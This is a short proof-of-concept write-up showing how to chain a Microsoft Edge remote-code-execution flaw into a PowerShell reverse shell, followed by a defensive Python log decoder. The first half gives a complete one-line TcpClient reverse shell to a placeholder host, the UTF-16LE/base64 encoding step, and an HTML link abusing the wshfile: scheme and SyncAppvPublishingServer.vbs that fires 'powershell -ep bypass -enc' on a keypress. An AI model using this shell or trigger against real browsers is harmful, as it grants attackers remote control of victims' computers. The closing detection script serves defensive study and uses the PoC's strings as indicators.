PoC for running a reverse shell in PowerShell, built on the author's PoC (https://leucosite.com/Microsoft-Edge-RCE/) for the RCE vulnerability in Microsoft Edge.
First we need to create a socket that makes a reverse connection in PowerShell:
$socket = new-object System.Net.Sockets.TcpClient('x.x.x.x', 8080);if($socket -eq $null){exit 1}$stream = $socket.GetStream();$writer = new-object System.IO.StreamWriter($stream);$buffer = new-object System.Byte[] 1024;$encoding = new-object System.Text.AsciiEncoding;do{$writer.Write("BertoShell> ");$writer.Flush();$read = $null;while($stream.DataAvailable -or ($read = $stream.Read($buffer, 0,1024)) -eq $null){}$out = $encoding.GetString($buffer, 0,$read).Replace("`r`n","").Replace("`n","");if(!$out.equals("exit")){$out = $out.split(' ');$res = [string](&$out[0] $out[1..$out.length]);if($res -ne $null){ $writer.WriteLine($res)}}}While (!$out.equals("exit"))$writer.close();$socket.close();
We encode it (UTF-16LE, then base64):
user@kali1:~$ cat ~/shellcode.txt | iconv --to-code UTF-16LE |base64
And we replace the call to the calculator in the author's PoC with the call to our PowerShell shell:
<a id="q" href='wshfile:test/../../System32/SyncAppvPublishingServer.vbs" test test;powershell -ep bypass -enc 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;"'>test</a> <script> window.onkeydown=e=>{ window.onkeydown=z={}; q.click() } </script>
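As an added defender-side example (not part of the original PoC or the author's code), the following Python decodes the UTF-16LE/base64 `-enc` argument from a process-creation log line, the same encoding the `iconv | base64` step above produces, and flags the indicators that appear in this PoC; the log line and its field layout are constructed assumptions.

```python
import base64
import re
from typing import Optional

# Constructed sample of a process-creation log line (not from the original page);
# the field layout is an assumption, and the -enc value is built exactly the way
# the page's `iconv --to-code UTF-16LE | base64` step builds it.
SAMPLE_COMMAND = "$socket = New-Object System.Net.Sockets.TcpClient('203.0.113.10', 8080)"
SAMPLE_LOG = (
    "ParentImage=C:\\Windows\\System32\\wscript.exe "
    "CommandLine=powershell -ep bypass -enc "
    + base64.b64encode(SAMPLE_COMMAND.encode("utf-16-le")).decode("ascii")
)

# PowerShell accepts -e, -ec, -enc and -EncodedCommand (case-insensitive);
# longest alternative first so "-EncodedCommand" is not cut short at "-enc".
ENC_ARG = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Strings worth alerting on, matched against the raw command line plus the
# decoded payload; all four come from the PoC on this page.
INDICATORS = {
    "syncappv_lolbin": "syncappvpublishingserver",
    "ep_bypass": "-ep bypass",
    "tcpclient": "system.net.sockets.tcpclient",
    "wshfile_scheme": "wshfile:",
}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -enc payload from a command line, or None if absent."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    b64 = m.group(1)
    b64 += "=" * (-len(b64) % 4)  # tolerate stripped padding
    try:
        raw = base64.b64decode(b64)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    # -enc payloads are UTF-16LE; replace rather than fail on truncated input.
    return raw.decode("utf-16-le", errors="replace")


def analyse(log_line: str) -> dict:
    """Decode any encoded command and report which indicators fire."""
    decoded = decode_encoded_command(log_line) or ""
    haystack = (log_line + " " + decoded).lower()
    hits = sorted(name for name, needle in INDICATORS.items() if needle in haystack)
    return {"decoded": decoded, "indicators": hits}


if __name__ == "__main__":
    print(analyse(SAMPLE_LOG))
```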